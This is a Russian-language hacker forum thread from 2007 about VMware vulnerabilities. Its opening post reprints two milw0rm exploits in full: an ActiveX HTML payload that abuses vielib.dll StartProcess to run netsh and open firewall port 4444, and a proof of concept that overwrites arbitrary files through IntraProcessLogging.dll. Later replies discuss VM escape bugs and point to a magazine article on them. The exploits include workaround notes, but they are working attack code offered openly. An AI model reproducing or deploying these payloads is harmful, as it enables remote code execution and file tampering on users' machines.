Уязвимости в VmWare

Виртуальные машины используются в качустве полигона для для иследования вредоносных программ, создания гостевой оси для хак опытов каждый для себя найдёт сам применения . Но так же как и другое ПО они не лешены ошибок в коде и поэтому и поэтому представляют собой соблазнительную идею для атак.
29 июля 2007 года хакер caLLAX из групы GOODFELLAS Security Research Team нашёл уязвимость в VmWare , он обнаружил что в состав VmWare входит любопытный ActiveX компонент, он реализован вдинамической библиотеке vielib.dll которая экспортирует потециально небезопасные методы.ОДним из таких методов является StartProcess позволяющий порождать процесы от имени текущего пользователя со всеми его привелегиями.
подробнее можно прочитать на :
http://www.securityfocus.com/bid/25118
сам эксплоит:

Code:

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
=============================================================================

Internal ID: VULWAR200707290.
-----------

Introduction
------------
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The StartProcess method doesn't check if it's being called from the application,
or malicious users. Remote Attacker could craft a html page and execute code in
a remote system with the actual user privileges.


Impact
------
Any computer that uses this Sofware will be exposed to Remote Execution Code.


Workaround
----------
- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
- Unregister vielib.dll using regsvr32.


Timeline
--------
July 29 2007 -- Bug Discovery.
July 29 2007 -- Exploit published.


Credits
-------
 * callAX <[email protected]>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------

StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
is using three standard files that exists in every Microsoft Office 2003 Application.


<HTML>
<BODY>
  <object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
<SCRIPT>

function Poc() {
 arg1 = "C:\\windows\\system32\\netsh.exe"
 arg2 = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
 arg3 = "C:\\windows\\system32\\"
 arg4 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
 arg5 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
 arg6 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
 arg7 = "1"
 ctrl.StartProcess(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7)
 }

</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-29]

http://milw0rm.com/exploits/4244
так же 30июля 2007 года (на следующий день)
этим же самым человеком была найдена ещё одна уязвимость в этой же библиотеке.
Так же 28 июля той же групой была найдена уязвимость в VmWare позволяющая произвести перезапись произвольного кода

Code:

<!--
---------------------------------------------------------------------------

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================

Internal ID: VULWAR200707280.
-----------

Introduction
------------
IntraProcessLogging.dll is a library included in the Program Vmware from
Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The SetLogFileName method doesn't check if it's being called from the
application,
or malicious users. Remote Attacker could craft a html page and overwrite
arbitrary
files in a system.


Impact
------
Any computer that uses this Sofware will be exposed to Data Write Arbitrary.


Workaround
----------
- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
- Unregister IntraProcessLogging.dll using regsvr32.


Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.


Credits
-------
 * callAX <[email protected]>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>


Technical Details
-----------------

SetLogFileName method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\arbitrary_file.txt"
   ctrl.SetLogFileName(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-28]

http://milw0rm.com/exploits/4240

и так в связи популяризации виртуальных машин начинаются оттачиваться новые технологии нападения и обороны на онные.

навеяно журналом хакер за сентябрь (постараясь зделать скан статей с описанием данной уязвимости)
Так же при поиске на http://milw0rm.com/search.php уязвимостей по запросу VmWare было показанно 5 уязвимостей что уже заставляет задуматься.

2007-07-30 VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit 6925 R D X callAX

2007-07-29 VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit 5887 R D X callAX
2007-07-28 VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit 3726 R D X callAX
2006-08-27 VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit 5491 R D c0ntex
2006-08-16 VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit 3663 R D X nop

 

Так уязвимость вроде как выполняется внутри vmware на которую поставлена винда, а не в самой реальной системе?..
И как тут же написано "создания гостевой оси для хак опытов". У меня на vmware рассадник троянов и вирусов, да и друзья заходят через radmin поприкалыватся. Так-что каких-то там уязвимостей внутри vmware бояться... Это странно
Если конечно vmware не использовать для vps.

 

Ошибка имевшая место в 2005 году

А вот здесь ты не прав так как уязвимость в vmnat.ехе входящей в состав VMWare Workstation 5.5.0 приводила к тому что при вызывания переполнения динамической памяти возможна была засылка кода на основную ось со всеми вытикающими из этого последствиями.
более подробно можно почитать в архиве с сканом журнала
http://slil.ru/24894467

 

В Хакере каком-то писали, что есть там уязвимость какая-то, использование, которой, позволяет "выйти за границы вээмваре"(номера 55-70 примерно)

 

статья Криса?

 

Статья называется побег из VMWare (Помоему так)
п\с: http://www.xakep.ru/magazine/xa/087/072/1.asp

 

Да Крис писал, 87 номер. Старая статья уже.

 

старая, но интересная)

 

В тот период было гораздо больше интересных статей чем сейчас=(